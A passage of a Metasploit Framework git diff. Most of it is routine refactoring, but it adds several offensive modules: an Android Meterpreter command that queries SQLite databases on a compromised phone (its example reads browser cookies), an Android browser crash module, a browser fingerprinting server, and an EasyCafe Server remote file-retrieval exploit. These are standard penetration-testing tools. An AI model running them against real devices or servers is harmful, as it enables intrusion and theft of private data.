Driver < Msf::Ui::Driver self.disable_output = false # Whether or not command passthru should be allowed - self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true + self.command_passthru = opts.fetch('AllowCommandPassthru', true) # Whether or not to confirm before exiting - self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false + self.confirm_exit = opts['ConfirmExit'] # Disables "dangerous" functionality of the console - @defanged = opts['Defanged'] == true + @defanged = opts['Defanged'] # If we're defanged, then command passthru should be disabled if @defanged @@ -659,7 +659,7 @@ protected def unknown_command(method, line) [method, method+".exe"].each do |cmd| - if (command_passthru == true and Rex::FileUtils.find_full_path(cmd)) + if command_passthru && Rex::FileUtils.find_full_path(cmd) print_status("exec: #{line}") print_line('') diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 6ce2bdd01e..7439f57d30 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb @@ -21,7 +21,3 @@ end # Executable generation and encoding require 'msf/util/exe' - -# Parse SVN entries -require 'msf/util/svn' - diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb deleted file mode 100644 index 8b5f10175a..0000000000 --- a/lib/msf/util/svn.rb +++ /dev/null @@ -1,120 +0,0 @@ -# -*- coding: binary -*- -### -# -# framework-util-svn -# -------------- -# -# The class provides methods for parsing the SVN information in the framework directory -# -### - -require 'date' - -module Msf -module Util -class SVN - - def self.load_root - info = {} - path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries") - if !::File.exists?(path) - return info - end - contents = '' - File.open(path, "rb") do |fd| - contents = fd.read(::File.size(path)) - end - if contents.include? " 7) - "%red#{diff.to_i} days ago%clr" - else - "#{diff.to_i} days ago" - end - end - end - - def self.last_updated_date - @@info ||= load_root - svnt = @@info[:updated] - if(not svnt) - return - end - begin - Date.parse(@@info[:updated]) - rescue ArgumentError - end - end - -end -end -end - diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index f189cefa52..fa4d1e8372 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -295,6 +295,33 @@ class Android < Extension end networks end + + def sqlite_query(dbname, query, writeable) + request = Packet.create_request('sqlite_query') + request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) + request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) + request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable) + response = client.send_request(request, 30) + error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR) + raise "SQLiteException: #{error_msg.value}" if error_msg + + unless writeable + result = { + columns: [], + rows: [] + } + data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) + unless data.nil? + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end + end + result + end + end + end end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 708f9bece2..15d047810b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -81,6 +81,15 @@ TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) +TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080) +TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081) +TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082) +TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083) +TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084) +TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085) +TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086) +TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087) + TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 077a1a51f9..c3d0f48aa9 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -31,6 +31,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => 'Get current lat-long using WLAN information', 'interval_collect' => 'Manage interval collection capabilities', 'activity_start' => 'Start an Android activity from a Uri string', + 'sqlite_query' => 'Query a SQLite database from storage', 'set_audio_mode' => 'Set Ringer Mode' } @@ -45,6 +46,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => ['wlan_geolocate'], 'interval_collect' => ['interval_collect'], 'activity_start' => ['activity_start'], + 'sqlite_query' => ['sqlite_query'], 'set_audio_mode' => ['set_audio_mode'] } @@ -189,7 +191,7 @@ class Console::CommandDispatcher::Android path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_sms_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for sms list'] + '-o' => [ true, 'Output path for sms list'] ) dump_sms_opts.parse(args) do |opt, _idx, val| @@ -277,7 +279,7 @@ class Console::CommandDispatcher::Android dump_contacts_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for contacts list'] + '-o' => [ true, 'Output path for contacts list'] ) dump_contacts_opts.parse(args) do |opt, _idx, val| @@ -381,7 +383,7 @@ class Console::CommandDispatcher::Android dump_calllog_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for call log'] + '-o' => [ true, 'Output path for call log'] ) @@ -578,6 +580,55 @@ class Console::CommandDispatcher::Android end end + def cmd_sqlite_query(*args) + sqlite_query_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ], + '-d' => [ true, 'The sqlite database file'], + '-q' => [ true, 'The sqlite statement to execute'], + '-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)'] + ) + + writeable = false + database = '' + query = '' + sqlite_query_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + print_line("Usage: sqlite_query -d -q \n") + print_line(sqlite_query_opts.usage) + return + when '-d' + database = val + when '-q' + query = val + when '-w' + writeable = true + end + end + + if database.blank? || query.blank? + print_error("You must enter both a database files and a query") + print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_line(sqlite_query_opts.usage) + return + end + + result = client.android.sqlite_query(database, query, writeable) + unless writeable + header = "#{query} on database file #{database}" + table = Rex::Ui::Text::Table.new( + 'Header' => header, + 'Columns' => result[:columns], + 'Indent' => 0 + ) + result[:rows].each do |e| + table << e + end + print_line + print_line(table.to_s) + end + end + # # Name for this dispatcher # diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 6539330307..f37ee3f4c8 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -65,7 +65,7 @@ begin when 'SSL2', :SSLv2 version = :SSLv2 # 'TLS' will be the new name for autonegotation with newer versions of OpenSSL - when 'SSL23', :SSLv23, 'TLS' + when 'SSL23', :SSLv23, 'TLS', 'Auto' version = :SSLv23 when 'SSL3', :SSLv3 version = :SSLv3 @@ -124,6 +124,11 @@ begin # Tie the context to a socket self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx) + # If peerhost looks like a hostname, set the undocumented 'hostname' + # attribute on sslsock, which enables the Server Name Indication (SNI) + # extension + self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost) + # Force a negotiation timeout begin Timeout.timeout(params.timeout) do diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 249c2f284f..80df353f99 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.2' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.3' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index 02688eded2..cd0ff5e1ec 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary def run print_status("Running MS SQL Server Enumeration...") - if mssql_login_datastore == false + if !mssql_login_datastore print_error("Login was unsuccessful. Check your credentials.") disconnect return diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index b90a4353fe..457af07b52 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']), - OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']), + OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]), ], self.class) end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index 739afedfcc..0e7d8b9cf3 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']), OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']), OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']), - OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']), + OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]), ], self.class) end @@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else - unless datastore['CREATE_NEW_VSC'] == true + unless datastore['CREATE_NEW_VSC'] vscpath = check_vss(text, bat) end unless vscpath diff --git a/modules/auxiliary/dos/android/android_stock_browser_iframe.rb b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb new file mode 100644 index 0000000000..9221626ed9 --- /dev/null +++ b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb @@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Android Stock Browser Iframe DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with Android 4.0.3. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jean Pascal Pereira', # Original exploit discovery + 'Jonathan Waggoner' # Metasploit module + ], + 'References' => [ + [ 'PACKETSTORM', '118539'], + [ 'CVE', '2012-6301' ] + ], + 'DisclosureDate' => "Dec 1 2012", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index f1a6fa892d..53b773fbb1 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -7,6 +7,9 @@ require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe') def initialize(info = {}) super( diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index eace3af7d4..9eb5b5a507 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -37,7 +37,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index cb7f6b02a2..5ad8dc5493 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -28,6 +28,9 @@ class MetasploitModule < Msf::Auxiliary [ 'MSB', 'MS09-065' ], [ 'OSVDB', '59869'] ], + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer', 'DisclosureDate' => 'Nov 10 2009' )) register_options([ diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index feca22a35c..737baefe67 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -538,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}") end # fuzz headers ? - if datastore['FUZZHEADERS'] == true + if datastore['FUZZHEADERS'] print_status("Fuzzing header fields") do_fuzz_headers(thisform,response.headers) end diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 0aaf08e0bd..5120544133 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -9,6 +9,9 @@ require 'net/ssh' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution') def initialize(info={}) super(update_info(info, @@ -130,4 +133,4 @@ class MetasploitModule < Msf::Auxiliary end end end -end +end \ No newline at end of file diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index 9619e2229f..b754e67c55 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary # set. # def use_zlib - unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false + unless Rex::Text.zlib_present? || !datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb new file mode 100644 index 0000000000..3279767ded --- /dev/null +++ b/modules/auxiliary/gather/browser_info.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "HTTP Client Information Gather", + 'Description' => %q{ + This module gathers information about a browser that exploits might be interested in, such + as OS name, browser version, plugins, etc. By default, the module will return a fake 404, + but you can customize this output by changing the Custom404 datastore option, and + redirect to an external web page. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'DisclosureDate' => "Mar 22 2016", + 'Actions' => + [ + [ + 'WebServer', { + 'Description' => 'A web that collects information about the browser.' + }] + ], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + )) + end + + def is_key_wanted?(key) + ![:module, :created_at, :tried, :vuln_test, :address].include?(key) + end + + def is_value_wanted?(value) + !(value.nil? || value =~ /^undefined|false/ || !value) + end + + def ignore_items!(target_info) + target_info.delete_if do |key, value| + !is_key_wanted?(key) || !is_value_wanted?(value) + end + end + + def report_host_info(target_info) + opts = { host: target_info[:address] } + opts.merge!(target_info) + report_host(opts) + end + + def translate_script_meaning(value) + case value + when 'script' + 'Browser allows JavaScript' + when 'headers' + 'Browser does not allow JavaScript' + end + end + + def print_target_info(cli, target_info) + print_status("#{cli.peerhost} - We have found the following interesting information:") + report_host_info(target_info) + ignore_items!(target_info) + target_info.each_pair do |key, value| + if key == :source + value = translate_script_meaning(value) + end + print_status("#{cli.peerhost} - #{key} = #{value}") + end + end + + def on_request_exploit(cli, req, target_info) + print_target_info(cli, target_info) + send_not_found(cli) + end + + def run + exploit + end + +end diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 0f1fe2fdd8..ea8870656f 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'DefaultOptions' => { - 'SSLVersion' => 'TLS1', 'SSL' => true } )) diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index b55153c22f..939b346978 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -286,7 +286,7 @@ class MetasploitModule < Msf::Auxiliary # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index eb16444b06..bbe30918cd 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary name = name.to_s.camelize(:lower) uri = api_path + name - cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1') + cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS') cli.connect req = cli.request_cgi({ 'uri' => uri, @@ -430,16 +430,15 @@ class MetasploitModule < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( [ OptString.new('HOSTNAME', [true, 'The target hostname']), OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]), - OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']), - OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']), - OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true']) + OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]), + OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]), + OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true]) ], self.class) end diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index 13ec9b5784..f048863072 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } ) diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 6f3b227141..b6bcfb05eb 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index d4c1612796..40b22af0f8 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary { 'SSL' => true, 'RPORT' => 443, - 'SSLVersion' => 'SSL3' }, 'References' => [ @@ -43,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ - OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]) + Opt::SSLVersion ] ) diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 80ffd465cd..4f702e5cc1 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) end diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 937559cb2c..d7f662fce7 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]), - OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]), OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]), OptString.new('TARGETURI', [true, 'The base path', '/']) ], self.class) @@ -35,8 +34,8 @@ class MetasploitModule < Msf::Auxiliary end def run - if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false - print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.") + if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES'] + print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.") else super end @@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary # If no response, quit now if res.nil? - print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No response") return end @@ -65,12 +64,12 @@ class MetasploitModule < Msf::Auxiliary server_header = val if key.downcase == 'server' end else - print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No HTTP headers") end # If the body is blank, just stop now as there is no chance of a title if res.body.nil? - print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage body") return end @@ -78,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary # there is no chance that we will have a title rx = %r{[\n\t\s]*(?<title>.+?)[\s\n\t]*}im.match(res.body.to_s) unless rx - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") return end @@ -86,13 +85,15 @@ class MetasploitModule < Msf::Auxiliary rx[:title].strip! if rx[:title] != '' rx_title = Rex::Text.html_decode(rx[:title]) - print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true - if datastore['STORE_NOTES'] == true + if datastore['SHOW_TITLES'] + print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") + end + if datastore['STORE_NOTES'] notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] } report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data) end else - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") end end diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index 27181ef83c..1bcadbbde9 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] vprint_good("#{rhost}:#{rport} - Response - File #{file}:") res.body.each_line do |line| # the following is the last line of the useless response @@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary end out = false end - elsif (res and res.code) + elsif res && res.code vprint_error("#{rhost}:#{rport} - File->#{file} not found") end end diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb new file mode 100644 index 0000000000..b16a4cfc06 --- /dev/null +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyCafe Server Remote File Access', + 'Description' => %q{ + This module exploits a file retrieval vulnerability in + EasyCafe Server. The vulnerability can be triggered by + sending a specially crafted packet (opcode 0x43) to the + 831/TCP port. + This module has been successfully tested on EasyCafe Server + version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 + and Windows 7 SP1. + Note that the server will throw a popup messagebox if the + specified file does not exist. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'R-73eN', # Vulnerability Discovery + 'Brendan Coles ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '39102' ] + ] + )) + + register_options( + [ + Opt::RPORT(831), + OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']) + ], self.class) + end + + def get_file + res = sock.get_once + unless res + print_error("Unable to retrieve file due to a timeout.") + return + end + + unless res.length == 261 + print_error("Received a response of an invalid size.") + return + end + + file_size = res.unpack('@256V')[0] + contents = '' + while contents.length < file_size + contents << sock.get_once + end + + print_status("File retrieved successfully (#{contents.length} bytes)!") + contents + end + + def run_host(ip) + file_path = datastore['FILEPATH'] + if file_path.length > 67 + print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.") + return + end + + packet = "\x43" + packet << file_path + packet << "\x00" * (255 - file_path.length) + packet << "\x01\x00\x00\x00\x01" + + vprint_status("Sending request (#{packet.length} bytes)") + connect + sock.put(packet) + + contents = get_file + disconnect + return if contents.nil? + + path = store_loot( + 'easycafe_server', + 'application/octet-stream', + ip, + contents, + File.basename(file_path) + ) + print_status("File saved in: #{path}") + end +end diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 4accba34bd..dd9d13985d 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 63b2249296..d6145d54e0 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb 